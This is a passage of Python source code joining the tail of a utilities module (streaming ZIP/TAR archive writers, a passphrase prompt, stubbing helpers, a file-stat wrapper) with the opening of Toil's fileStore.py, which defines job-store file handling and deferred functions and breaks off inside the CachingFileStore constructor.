prompt2="Verify passphrase:"):
"""A utility function to read a passphrase from stdin."""
while 1:
try:
p1 = getpass.getpass(prompt1)
if verify:
p2 = getpass.getpass(prompt2)
if p1 == p2:
break
else:
break
except KeyboardInterrupt:
return None
return p1
class PRNG(object):
"""An optimized PRNG."""
random_list = []
@classmethod
def GetUShort(cls):
return cls.GetULong() & 0xFFFF
@classmethod
def GetULong(cls):
while True:
try:
return cls.random_list.pop()
except IndexError:
PRNG.random_list = list(
struct.unpack("=" + "L" * 1000,
os.urandom(struct.calcsize("=L") * 1000)))
def FormatNumberAsString(num):
"""Return a large number in human readable form."""
for suffix in ["b", "KB", "MB", "GB"]:
if num < 1024.0:
return "%3.2f%s" % (num, suffix)
num /= 1024.0
return "%3.1f%s" % (num, "TB")
class NotAValue(object):
pass
class HeartbeatQueue(Queue.Queue):
"""A queue that periodically calls a provided callback while waiting."""
def __init__(self, callback=None, fast_poll_time=60, *args, **kw):
Queue.Queue.__init__(self, *args, **kw)
self.callback = callback or (lambda: None)
self.last_item_time = time.time()
self.fast_poll_time = fast_poll_time
def get(self, poll_interval=5):
while True:
try:
# Using Queue.get() with a timeout is really expensive - Python uses
# busy waiting that wakes up the process every 50ms - so we switch
# to a more efficient polling method if there is no activity for
# <fast_poll_time> seconds.
if time.time() - self.last_item_time < self.fast_poll_time:
message = Queue.Queue.get(self, block=True, timeout=poll_interval)
else:
time.sleep(poll_interval)
message = Queue.Queue.get(self, block=False)
break
except Queue.Empty:
self.callback()
self.last_item_time = time.time()
return message
class RollingMemoryStream(object):
"""Append-only memory stream that allows writing data in chunks."""
def __init__(self):
self._stream = cStringIO.StringIO()
self._offset = 0
def write(self, b): # pylint: disable=invalid-name
if not self._stream:
raise ArchiveAlreadyClosedError("Attempting to write to a closed stream.")
self._stream.write(b)
self._offset += len(b)
def flush(self): # pylint: disable=invalid-name
pass
def tell(self): # pylint: disable=invalid-name
return self._offset
def close(self): # pylint: disable=invalid-name
self._stream = None
def GetValueAndReset(self):
"""Gets stream buffer since the last GetValueAndReset() call."""
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to get a value from a closed stream.")
value = self._stream.getvalue()
self._stream.seek(0)
self._stream.truncate()
return value
class ArchiveAlreadyClosedError(Error):
pass
class StreamingZipGenerator(object):
"""A streaming zip generator that can archive file-like objects."""
FILE_CHUNK_SIZE = 1024 * 1024 * 4
def __init__(self, compression=zipfile.ZIP_STORED):
self._stream = RollingMemoryStream()
self._zip_fd = zipfile.ZipFile(
self._stream, mode="w", compression=compression, allowZip64=True)
self._compression = compression
self._ResetState()
def _ResetState(self):
self.cur_zinfo = None
self.cur_file_size = 0
self.cur_compress_size = 0
self.cur_cmpr = None
self.cur_crc = 0
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Close()
def _GenerateZipInfo(self, arcname=None, compress_type=None, st=None):
"""Generate ZipInfo instance for the given name, compression and stat.
Args:
arcname: The name in the archive this should take.
compress_type: Compression type (zipfile.ZIP_DEFLATED, or ZIP_STORED)
st: An optional stat object to be used for setting headers.
Returns:
ZipInfo instance.
Raises:
ValueError: If arcname is not provided.
"""
# Fake stat response.
if st is None:
st = os.stat_result((0100644, 0, 0, 0, 0, 0, 0, 0, 0, 0))
mtime = time.localtime(st.st_mtime or time.time())
date_time = mtime[0:6]
# Create ZipInfo instance to store file information
if arcname is None:
raise ValueError("An arcname must be provided.")
zinfo = zipfile.ZipInfo(arcname, date_time)
zinfo.external_attr = (st[0] & 0xFFFF) << 16L # Unix attributes
if compress_type is None:
zinfo.compress_type = self._compression
else:
zinfo.compress_type = compress_type
zinfo.file_size = 0
zinfo.compress_size = 0
zinfo.flag_bits = 0x08 # Setting data descriptor flag.
zinfo.CRC = 0x08074b50 # Predefined CRC for archives using data
# descriptors.
# This fills an empty Info-ZIP Unix extra field.
zinfo.extra = struct.pack(
"<HHIIHH",
0x5855,
12,
0, # time of last access (UTC/GMT)
0, # time of last modification (UTC/GMT)
0, # user ID
0) # group ID
return zinfo
def WriteSymlink(self, src_arcname, dst_arcname):
"""Writes a symlink into the archive."""
# Inspired by:
# http://www.mail-archive.com/python-list@python.org/msg34223.html
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to write to a ZIP archive that was already closed.")
src_arcname = SmartStr(src_arcname)
dst_arcname = SmartStr(dst_arcname)
zinfo = zipfile.ZipInfo(dst_arcname)
# This marks a symlink.
zinfo.external_attr = (0644 | 0120000) << 16
# This marks create_system as UNIX.
zinfo.create_system = 3
# This fills the ASi UNIX extra field, see:
# http://www.opensource.apple.com/source/zip/zip-6/unzip/unzip/proginfo/extra.fld
zinfo.extra = struct.pack(
"<HHIHIHHs",
0x756e,
len(src_arcname) + 14,
0, # CRC-32 of the remaining data
0120000, # file permissions
0, # target file size
0, # user ID
0, # group ID
src_arcname)
self._zip_fd.writestr(zinfo, src_arcname)
return self._stream.GetValueAndReset()
def WriteFileHeader(self, arcname=None, compress_type=None, st=None):
"""Writes a file header."""
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to write to a ZIP archive that was already closed.")
self.cur_zinfo = self._GenerateZipInfo(
arcname=arcname, compress_type=compress_type, st=st)
self.cur_file_size = 0
self.cur_compress_size = 0
if self.cur_zinfo.compress_type == zipfile.ZIP_DEFLATED:
self.cur_cmpr = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION,
zlib.DEFLATED, -15)
else:
self.cur_cmpr = None
self.cur_crc = 0
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to write to a ZIP archive that was already closed.")
self.cur_zinfo.header_offset = self._stream.tell()
# Call _writeCheck(self.cur_zinfo) to do sanity checking on zinfo structure
# that we've constructed.
self._zip_fd._writecheck(self.cur_zinfo) # pylint: disable=protected-access
# Mark ZipFile as dirty. We have to keep self._zip_fd's internal state
# coherent so that it behaves correctly when close() is called.
self._zip_fd._didModify = True # pylint: disable=protected-access
# Write FileHeader now. It's incomplete, but CRC and uncompressed/compressed
# sized will be written later in data descriptor.
self._stream.write(self.cur_zinfo.FileHeader())
return self._stream.GetValueAndReset()
def WriteFileChunk(self, chunk):
"""Writes file chunk."""
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to write to a ZIP archive that was already closed.")
self.cur_file_size += len(chunk)
self.cur_crc = zipfile.crc32(chunk, self.cur_crc) & 0xffffffff
if self.cur_cmpr:
chunk = self.cur_cmpr.compress(chunk)
self.cur_compress_size += len(chunk)
self._stream.write(chunk)
return self._stream.GetValueAndReset()
def WriteFileFooter(self):
"""Writes the file footer (finished the file)."""
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to write to a ZIP archive that was already closed.")
if self.cur_cmpr:
buf = self.cur_cmpr.flush()
self.cur_compress_size += len(buf)
self.cur_zinfo.compress_size = self.cur_compress_size
self._stream.write(buf)
else:
self.cur_zinfo.compress_size = self.cur_file_size
self.cur_zinfo.CRC = self.cur_crc
self.cur_zinfo.file_size = self.cur_file_size
# The zip footer has a 8 bytes limit for sizes so if we compress a
# file larger than 4 GB, the code below will not work. The ZIP64
# convention is to write 0xffffffff for compressed and
# uncompressed size in those cases. The actual size is written by
# the library for us anyways so those fields are redundant.
cur_file_size = min(0xffffffff, self.cur_file_size)
cur_compress_size = min(0xffffffff, self.cur_compress_size)
# Writing data descriptor ZIP64-way by default. We never know how large
# the archive may become as we're generating it dynamically.
#
# crc-32 8 bytes (little endian)
# compressed size 8 bytes (little endian)
# uncompressed size 8 bytes (little endian)
self._stream.write(
struct.pack("<LLL", self.cur_crc, cur_compress_size, cur_file_size))
# Register the file in the zip file, so that central directory gets
# written correctly.
self._zip_fd.filelist.append(self.cur_zinfo)
self._zip_fd.NameToInfo[self.cur_zinfo.filename] = self.cur_zinfo
self._ResetState()
return self._stream.GetValueAndReset()
@property
def is_file_write_in_progress(self):
return self.cur_zinfo
def WriteFromFD(self, src_fd, arcname=None, compress_type=None, st=None):
"""Write a zip member from a file like object.
Args:
src_fd: A file like object, must support seek(), tell(), read().
arcname: The name in the archive this should take.
compress_type: Compression type (zipfile.ZIP_DEFLATED, or ZIP_STORED)
st: An optional stat object to be used for setting headers.
Raises:
ArchiveAlreadyClosedError: If the zip if already closed.
Yields:
Chunks of binary data.
"""
yield self.WriteFileHeader(
arcname=arcname, compress_type=compress_type, st=st)
while 1:
buf = src_fd.read(1024 * 1024)
if not buf:
break
yield self.WriteFileChunk(buf)
yield self.WriteFileFooter()
def Close(self):
self._zip_fd.close()
value = self._stream.GetValueAndReset()
self._stream.close()
return value
@property
def output_size(self):
return self._stream.tell()
class StreamingZipWriter(object):
"""A streaming zip file writer which can copy from file like objects.
The streaming writer should be capable of compressing files of arbitrary
size without eating all the memory. It's built on top of Python's zipfile
module, but has to use some hacks, as standard library doesn't provide
all the necessary API to do streaming writes.
"""
def __init__(self, fd_or_path, mode="wb", compression=zipfile.ZIP_STORED):
"""Open streaming ZIP file with mode read "r", write "w" or append "a".
Args:
fd_or_path: Either the path to the file, or a file-like object.
If it is a path, the file will be opened and closed by
ZipFile.
mode: The mode can be either read "r", write "w" or append "a".
compression: ZIP_STORED (no compression) or ZIP_DEFLATED (requires zlib).
"""
if hasattr(fd_or_path, "write"):
self._fd = fd_or_path
else:
self._fd = open(fd_or_path, mode)
self._generator = StreamingZipGenerator(compression=compression)
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Close()
def Close(self):
self._fd.write(self._generator.Close())
def WriteSymlink(self, src_arcname, dst_arcname):
"""Writes a symlink into the archive."""
self._fd.write(self._generator.WriteSymlink(src_arcname, dst_arcname))
def WriteFromFD(self, src_fd, arcname=None, compress_type=None, st=None):
"""Write a zip member from a file like object.
Args:
src_fd: A file like object, must support seek(), tell(), read().
arcname: The name in the archive this should take.
compress_type: Compression type (zipfile.ZIP_DEFLATED, or ZIP_STORED)
st: An optional stat object to be used for setting headers.
Raises:
ArchiveAlreadyClosedError: If the zip if already closed.
"""
for chunk in self._generator.WriteFromFD(
src_fd, arcname=arcname, compress_type=compress_type, st=st):
self._fd.write(chunk)
class StreamingTarGenerator(object):
"""A streaming tar generator that can archive file-like objects."""
FILE_CHUNK_SIZE = 1024 * 1024 * 4
def __init__(self):
super(StreamingTarGenerator, self).__init__()
self._stream = RollingMemoryStream()
self._tar_fd = tarfile.open(
mode="w:gz", fileobj=self._stream, encoding="utf-8")
self._ResetState()
def _ResetState(self):
self.cur_file_size = 0
self.cur_info = None
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Close()
def Close(self):
self._tar_fd.close()
value = self._stream.GetValueAndReset()
self._stream.close()
return value
def WriteSymlink(self, src_arcname, dst_arcname):
"""Writes a symlink into the archive."""
info = self._tar_fd.tarinfo()
info.tarfile = self._tar_fd
info.name = SmartStr(dst_arcname)
info.size = 0
info.mtime = time.time()
info.type = tarfile.SYMTYPE
info.linkname = SmartStr(src_arcname)
self._tar_fd.addfile(info)
return self._stream.GetValueAndReset()
def WriteFileHeader(self, arcname=None, st=None):
"""Writes file header."""
if st is None:
raise ValueError("Stat object can't be None.")
self.cur_file_size = 0
self.cur_info = self._tar_fd.tarinfo()
self.cur_info.tarfile = self._tar_fd
self.cur_info.type = tarfile.REGTYPE
self.cur_info.name = SmartStr(arcname)
self.cur_info.size = st.st_size
self.cur_info.mode = st.st_mode
self.cur_info.mtime = st.st_mtime or time.time()
self._tar_fd.addfile(self.cur_info)
return self._stream.GetValueAndReset()
def WriteFileChunk(self, chunk):
"""Writes file chunk."""
self._tar_fd.fileobj.write(chunk)
self.cur_file_size += len(chunk)
return self._stream.GetValueAndReset()
def WriteFileFooter(self):
"""Writes file footer (finishes the file)."""
if self.cur_file_size != self.cur_info.size:
raise IOError("Incorrect file size: st_size=%d, but written %d bytes." %
(self.cur_info.size, self.cur_file_size))
blocks, remainder = divmod(self.cur_file_size, tarfile.BLOCKSIZE)
if remainder > 0:
self._tar_fd.fileobj.write(tarfile.NUL * (tarfile.BLOCKSIZE - remainder))
blocks += 1
self._tar_fd.offset += blocks * tarfile.BLOCKSIZE
self._ResetState()
return self._stream.GetValueAndReset()
@property
def is_file_write_in_progress(self):
return self.cur_info
def WriteFromFD(self, src_fd, arcname=None, st=None):
"""Write an archive member from a file like object.
Args:
src_fd: A file like object, must support seek(), tell(), read().
arcname: The name in the archive this should take.
st: A stat object to be used for setting headers.
Raises:
ValueError: If st is omitted.
ArchiveAlreadyClosedError: If the archive was already closed.
IOError: if file size reported in st is different from the one that
was actually read from the src_fd.
Yields:
Chunks of binary data.
"""
yield self.WriteFileHeader(arcname=arcname, st=st)
while 1:
buf = src_fd.read(1024 * 1024)
if not buf:
break
yield self.WriteFileChunk(buf)
yield self.WriteFileFooter()
@property
def output_size(self):
return self._stream.tell()
class StreamingTarWriter(object):
"""A streaming tar file writer which can copy from file like objects.
The streaming writer should be capable of compressing files of arbitrary
size without eating all the memory. It's built on top of Python's tarfile
module.
"""
def __init__(self, fd_or_path, mode="w"):
if hasattr(fd_or_path, "write"):
self.tar_fd = tarfile.open(
mode=mode, fileobj=fd_or_path, encoding="utf-8")
else:
self.tar_fd = tarfile.open(name=fd_or_path, mode=mode, encoding="utf-8")
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Close()
def Close(self):
self.tar_fd.close()
def WriteSymlink(self, src_arcname, dst_arcname):
"""Writes a symlink into the archive."""
info = self.tar_fd.tarinfo()
info.tarfile = self.tar_fd
info.name = SmartStr(dst_arcname)
info.size = 0
info.mtime = time.time()
info.type = tarfile.SYMTYPE
info.linkname = SmartStr(src_arcname)
self.tar_fd.addfile(info)
def WriteFromFD(self, src_fd, arcname=None, st=None):
"""Write an archive member from a file like object.
Args:
src_fd: A file like object, must support seek(), tell(), read().
arcname: The name in the archive this should take.
st: A stat object to be used for setting headers.
Raises:
ValueError: If st is omitted.
"""
if st is None:
raise ValueError("Stat object can't be None.")
info = self.tar_fd.tarinfo()
info.tarfile = self.tar_fd
info.type = tarfile.REGTYPE
info.name = SmartStr(arcname)
info.size = st.st_size
info.mode = st.st_mode
info.mtime = st.st_mtime or time.time()
self.tar_fd.addfile(info, src_fd)
class Stubber(object):
"""A context manager for doing simple stubs."""
def __init__(self, module, target_name, stub):
self.target_name = target_name
self.module = module
self.stub = stub
def __enter__(self):
self.Start()
def Stop(self):
setattr(self.module, self.target_name, self.old_target)
def Start(self):
self.old_target = getattr(self.module, self.target_name, None)
try:
self.stub.old_target = self.old_target
except AttributeError:
pass
setattr(self.module, self.target_name, self.stub)
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Stop()
class MultiStubber(object):
"""A context manager for doing simple stubs."""
def __init__(self, *args):
self.stubbers = [Stubber(*x) for x in args]
def Start(self):
for x in self.stubbers:
x.Start()
def Stop(self):
for x in self.stubbers:
x.Stop()
def __enter__(self):
self.Start()
def __exit__(self, t, value, traceback):
self.Stop()
class DataObject(dict):
"""This class wraps a dict and provides easier access functions."""
def Register(self, item, value=None):
if item in self:
raise AttributeError("Item %s already registered." % item)
self[item] = value
def __setattr__(self, item, value):
self[item] = value
def __getattr__(self, item):
try:
return self[item]
except KeyError as e:
raise AttributeError(e)
def __dir__(self):
return sorted(self.keys()) + dir(self.__class__)
def __str__(self):
result = []
for k, v in self.items():
tmp = " %s = " % k
try:
for line in SmartUnicode(v).splitlines():
tmp += " %s\n" % line
except Exception as e: # pylint: disable=broad-except
tmp += "Error: %s\n" % e
result.append(tmp)
return "{\n%s}\n" % "".join(result)
def EnsureDirExists(path):
"""Equivalent of makedir -p."""
try:
os.makedirs(path)
except OSError as exc:
# Necessary so we don't hide other errors such as permission denied.
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def ResolveHostnameToIP(host, port):
ip_addrs = socket.getaddrinfo(host, port, socket.AF_UNSPEC, 0,
socket.IPPROTO_TCP)
# getaddrinfo returns tuples (family, socktype, proto, canonname, sockaddr).
# We are interested in sockaddr which is in turn a tuple
# (address, port) for IPv4 or (address, port, flow info, scope id)
# for IPv6. In both cases, we want the first element, the address.
return ip_addrs[0][4][0]
# TODO(hanuszczak): This module is way too big right now. It should be split
# into several smaller ones (such as `util.paths`, `util.collections` etc.).
class Stat(object):
"""A wrapper around standard `os.[l]stat` function.
The standard API for using `stat` results is very clunky and unpythonic.
This is an attempt to create a more familiar and consistent interface to make
the code look cleaner.
Moreover, standard `stat` does not properly support extended flags - even
though the documentation mentions that `stat.st_flags` should work on macOS
and Linux it works only on macOS and raises an error on Linux (and Windows).
This class handles that and fetches these flags lazily (as it can be costly
operation on Linux).
Args:
path: A path to the file to perform `stat` on.
follow_symlink: True if `stat` of a symlink should be returned instead of a
file that it points to. For non-symlinks this setting has no effect.
"""
def __init__(self, path, follow_symlink=True):
self._path = path
if not follow_symlink:
self._stat = os.lstat(path)
else:
self._stat = os.stat(path)
self._flags_linux = None
self._flags_osx = None
def GetRaw(self):
return self._stat
def GetLinuxFlags(self):
if self._flags_linux is None:
self._flags_linux = self._FetchLinuxFlags()
return self._flags_linux
def GetOsxFlags(self):
if self._flags_osx is None:
self._flags_osx = self._FetchOsxFlags()
return self._flags_osx
def GetSize(self):
return self._stat.st_size
def GetAccessTime(self):
return self._stat.st_atime
def GetModificationTime(self):
return self._stat.st_mtime
def GetChangeTime(self):
return self._stat.st_ctime
def GetDevice(self):
return self._stat.st_dev
def IsDirectory(self):
return stat.S_ISDIR(self._stat.st_mode)
def IsRegular(self):
return stat.S_ISREG(self._stat.st_mode)
def IsSocket(self):
return stat.S_ISSOCK(self._stat.st_mode)
def IsSymlink(self):
return stat.S_ISLNK(self._stat.st_mode)
# http://manpages.courier-mta.org/htmlman2/ioctl_list.2.html
FS_IOC_GETFLAGS = 0x80086601
def _FetchLinuxFlags(self):
"""Fetches Linux extended file flags."""
if platform.system() != "Linux":
return 0
# Since we open a file in the next step we do not want to open a symlink.
# `lsattr` returns an error when trying to check flags of a symlink, so we
# assume that symlinks cannot have them.
if self.IsSymlink():
return 0
# Some files (e.g. sockets) cannot be opened. For these we do not really
# care about extended flags (they should have none). `lsattr` does not seem
# to support such cases anyway. It is also possible that a file has been
# deleted (because this method is used lazily).
try:
fd = os.open(self._path, os.O_RDONLY)
except (IOError, OSError):
return 0
try:
# This import is Linux-specific.
import fcntl # pylint: disable=g-import-not-at-top
buf = array.array("l", [0])
fcntl.ioctl(fd, self.FS_IOC_GETFLAGS, buf)
return buf[0]
except (IOError, OSError):
# File system does not support extended attributes.
return 0
finally:
os.close(fd)
def _FetchOsxFlags(self):
"""Fetches macOS extended file flags."""
if platform.system() != "Darwin":
return 0
return self._stat.st_flags
|
fileStore.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from builtins import range
from builtins import object
from abc import abstractmethod, ABCMeta
from collections import namedtuple, defaultdict
from contextlib import contextmanager
from fcntl import flock, LOCK_EX, LOCK_UN
from functools import partial
from hashlib import sha1
from threading import Thread, Semaphore, Event
from future.utils import with_metaclass
from six.moves.queue import Empty, Queue
import base64
import dill
import errno
import logging
import os
import shutil
import stat
import tempfile
import time
import uuid
from toil.lib.objects import abstractclassmethod
from toil.lib.humanize import bytes2human
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.resource import ModuleDescriptor
logger = logging.getLogger(__name__)
class DeferredFunction(namedtuple('DeferredFunction', 'function args kwargs name module')):
"""
>>> df = DeferredFunction.create(defaultdict, None, {'x':1}, y=2)
>>> df
DeferredFunction(defaultdict, ...)
>>> df.invoke() == defaultdict(None, x=1, y=2)
True
"""
@classmethod
def create(cls, function, *args, **kwargs):
"""
Capture the given callable and arguments as an instance of this class.
:param callable function: The deferred action to take in the form of a function
:param tuple args: Non-keyword arguments to the function
:param dict kwargs: Keyword arguments to the function
"""
# The general principle is to deserialize as late as possible, i.e. when the function is
# to be invoked, as that will avoid redundantly deserializing deferred functions for
# concurrently running jobs when the cache state is loaded from disk. By implication we
# should serialize as early as possible. We need to serialize the function as well as its
# arguments.
return cls(*list(map(dill.dumps, (function, args, kwargs))),
name=function.__name__,
module=ModuleDescriptor.forModule(function.__module__).globalize())
def invoke(self):
"""
Invoke the captured function with the captured arguments.
"""
logger.debug('Running deferred function %s.', self)
self.module.makeLoadable()
function, args, kwargs = list(map(dill.loads, (self.function, self.args, self.kwargs)))
return function(*args, **kwargs)
def __str__(self):
return '%s(%s, ...)' % (self.__class__.__name__, self.name)
__repr__ = __str__
class FileStore(with_metaclass(ABCMeta, object)):
"""
An abstract base class to represent the interface between a worker and the job store. Concrete
subclasses will be used to manage temporary files, read and write files from the job store and
log messages, passed as argument to the :meth:`toil.job.Job.run` method.
"""
# Variables used for syncing reads/writes
_pendingFileWritesLock = Semaphore()
_pendingFileWrites = set()
_terminateEvent = Event() # Used to signify crashes in threads
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.localTempDir = os.path.abspath(localTempDir)
self.workFlowDir = os.path.dirname(self.localTempDir)
self.jobName = self.jobGraph.command.split()[1]
self.inputBlockFn = inputBlockFn
self.loggingMessages = []
self.filesToDelete = set()
self.jobsToDelete = set()
@staticmethod
def createFileStore(jobStore, jobGraph, localTempDir, inputBlockFn, caching):
fileStoreCls = CachingFileStore if caching else NonCachingFileStore
return fileStoreCls(jobStore, jobGraph, localTempDir, inputBlockFn)
@abstractmethod
@contextmanager
def open(self, job):
"""
The context manager used to conduct tasks prior-to, and after a job has been run.
:param toil.job.Job job: The job instance of the toil job to run.
"""
raise NotImplementedError()
# Functions related to temp files and directories
def getLocalTempDir(self):
"""
Get a new local temporary directory in which to write files that persist for the duration of
the job.
:return: The absolute path to a new local temporary directory. This directory will exist
for the duration of the job only, and is guaranteed to be deleted once the job
terminates, removing all files it contains recursively.
:rtype: str
"""
return os.path.abspath(tempfile.mkdtemp(prefix="t", dir=self.localTempDir))
def getLocalTempFile(self):
"""
Get a new local temporary file that will persist for the duration of the job.
:return: The absolute path to a local temporary file. This file will exist for the
duration of the job only, and is guaranteed to be deleted once the job terminates.
:rtype: str
"""
handle, tmpFile = tempfile.mkstemp(prefix="tmp", suffix=".tmp", dir=self.localTempDir)
os.close(handle)
return os.path.abspath(tmpFile)
def getLocalTempFileName(self):
"""
Get a valid name for a new local file. Don't actually create a file at the path.
:return: Path to valid file
:rtype: str
"""
# Create, and then delete a temp file. Creating will guarantee you a unique, unused
# file name. There is a very, very, very low chance that another job will create the
# same file name in the span of this one being deleted and then being used by the user.
tempFile = self.getLocalTempFile()
os.remove(tempFile)
return tempFile
# Functions related to reading, writing and removing files to/from the job store
@abstractmethod
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store.
:param string localFileName: The path to the local file to upload.
:param bool cleanup: if True then the copy of the global file will be deleted once the
job and all its successors have completed running. If not the global file must be
deleted manually.
:return: an ID that can be used to retrieve the file.
:rtype: toil.fileStore.FileID
"""
raise NotImplementedError()
def writeGlobalFileStream(self, cleanup=False):
"""
Similar to writeGlobalFile, but allows the writing of a stream to the job store.
The yielded file handle does not need to and should not be closed explicitly.
:param bool cleanup: is as in :func:`toil.fileStore.FileStore.writeGlobalFile`.
:return: A context manager yielding a tuple of
1) a file handle which can be written to and
2) the ID of the resulting file in the job store.
"""
# TODO: Make this work with FileID
return self.jobStore.writeFileStream(None if not cleanup else self.jobGraph.jobStoreID)
@abstractmethod
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Makes the file associated with fileStoreID available locally. If mutable is True,
then a copy of the file will be created locally so that the original is not modified
and does not change the file for other jobs. If mutable is False, then a link can
be created to the file, saving disk resources.
If a user path is specified, it is used as the destination. If a user path isn't
specified, the file is stored in the local temp directory with an encoded name.
:param toil.fileStore.FileID fileStoreID: job store id for the file
:param string userPath: a path to the name of file to which the global file will be copied
or hard-linked (see below).
:param bool cache: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:param bool mutable: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:return: An absolute path to a local, temporary copy of the file keyed by fileStoreID.
:rtype: str
"""
raise NotImplementedError()
@abstractmethod
def readGlobalFileStream(self, fileStoreID):
"""
Similar to readGlobalFile, but allows a stream to be read from the job store. The yielded
file handle does not need to and should not be closed explicitly.
:return: a context manager yielding a file handle which can be read from.
"""
raise NotImplementedError()
@abstractmethod
def deleteLocalFile(self, fileStoreID):
"""
Deletes Local copies of files associated with the provided job store ID.
:param str fileStoreID: File Store ID of the file to be deleted.
"""
raise NotImplementedError()
@abstractmethod
def deleteGlobalFile(self, fileStoreID):
"""
Deletes local files with the provided job store ID and then permanently deletes them from
the job store. To ensure that the job can be restarted if necessary, the delete will not
happen until after the job's run method has completed.
:param fileStoreID: the job store ID of the file to be deleted.
"""
raise NotImplementedError()
# Functions used to read and write files directly between a source url and the job store.
def importFile(self, srcUrl, sharedFileName=None):
return self.jobStore.importFile(srcUrl, sharedFileName=sharedFileName)
def exportFile(self, jobStoreFileID, dstUrl):
raise NotImplementedError()
# A utility method for accessing filenames
def _resolveAbsoluteLocalPath(self, filePath):
"""
Return the absolute path to filePath. This is a wrapper for os.path.abspath because mac OS
symlinks /tmp and /var (the most common places for a default tempdir) to /private/tmp and
/private/var respectively.
:param str filePath: The absolute or relative path to the file. If relative, it must be
relative to the local temp working dir
:return: Absolute path to key
:rtype: str
"""
if os.path.isabs(filePath):
return os.path.abspath(filePath)
else:
return os.path.join(self.localTempDir, filePath)
class _StateFile(object):
"""
Utility class to read and write dill-ed state dictionaries from/to a file into a namespace.
"""
def __init__(self, stateDict):
assert isinstance(stateDict, dict)
self.__dict__.update(stateDict)
@abstractclassmethod
@contextmanager
def open(cls, outer=None):
"""
This is a context manager that state file and reads it into an object that is returned
to the user in the yield.
:param outer: Instance of the calling class (to use outer methods).
"""
raise NotImplementedError()
@classmethod
def _load(cls, fileName):
"""
Load the state of the cache from the state file
:param str fileName: Path to the cache state file.
:return: An instance of the state as a namespace.
:rtype: _StateFile
"""
# Read the value from the cache state file then initialize and instance of
# _CacheState with it.
with open(fileName, 'rb') as fH:
infoDict = dill.load(fH)
return cls(infoDict)
def write(self, fileName):
"""
Write the current state into a temporary file then atomically rename it to the main
state file.
:param str fileName: Path to the state file.
"""
with open(fileName + '.tmp', 'wb') as fH:
# Based on answer by user "Mark" at:
# http://stackoverflow.com/questions/2709800/how-to-pickle-yourself
# We can't pickle nested classes. So we have to pickle the variables of the class
# If we ever change this, we need to ensure it doesn't break FileID
dill.dump(self.__dict__, fH)
os.rename(fileName + '.tmp', fileName)
# Methods related to the deferred function logic
@abstractclassmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
This function looks at the state of all jobs registered on the node and will handle them
(clean up their presence ont he node, and run any registered defer functions)
:param nodeInfo: Information regarding the node required for identifying dead jobs.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
"""
raise NotImplementedError()
@abstractmethod
def _registerDeferredFunction(self, deferredFunction):
"""
Register the given deferred function with this job.
:param DeferredFunction deferredFunction: the function to register
"""
raise NotImplementedError()
@staticmethod
def _runDeferredFunctions(deferredFunctions):
"""
Invoke the specified deferred functions and return a list of names of functions that
raised an exception while being invoked.
:param list[DeferredFunction] deferredFunctions: the DeferredFunctions to run
:rtype: list[str]
"""
failures = []
for deferredFunction in deferredFunctions:
try:
deferredFunction.invoke()
except:
failures.append(deferredFunction.name)
logger.exception('%s failed.', deferredFunction)
return failures
# Functions related to logging
def logToMaster(self, text, level=logging.INFO):
"""
Send a logging message to the leader. The message will also be \
logged by the worker at the same level.
:param text: The string to log.
:param int level: The logging level.
"""
logger.log(level=level, msg=("LOG-TO-MASTER: " + text))
self.loggingMessages.append(dict(text=text, level=level))
# Functions run after the completion of the job.
@abstractmethod
def _updateJobWhenDone(self):
"""
Update the status of the job on the disk.
"""
raise NotImplementedError()
@abstractmethod
def _blockFn(self):
"""
Blocks while _updateJobWhenDone is running. This function is called by this job's
successor to ensure that it does not begin modifying the job store until after this job has
finished doing so.
"""
raise NotImplementedError()
# Utility function used to identify if a pid is still running on the node.
@staticmethod
def _pidExists(pid):
"""
This will return True if the process associated with pid is still running on the machine.
This is based on stackoverflow question 568271.
:param int pid: ID of the process to check for
:return: True/False
:rtype: bool
"""
assert pid > 0
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
else:
raise
else:
return True
@abstractclassmethod
def shutdown(cls, dir_):
"""
Shutdown the filestore on this node.
This is intended to be called on batch system shutdown.
:param dir_: The jeystone directory containing the required information for fixing the state
of failed workers on the node before cleaning up.
"""
raise NotImplementedError()
class CachingFileStore(FileStore):
"""
A cache-enabled file store that attempts to use hard-links and asynchronous job store writes to
reduce I/O between, and during jobs.
"""
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# Variables related to asynchronous writes.
self.workerNumber = 2
self.queue = Queue()
self.updateSemaphore = Semaphore()
self.workers = [Thread(target=self.asyncWrite) for i in range(self.workerNumber)]
for worker in self.workers:
worker.start()
# Variables related to caching
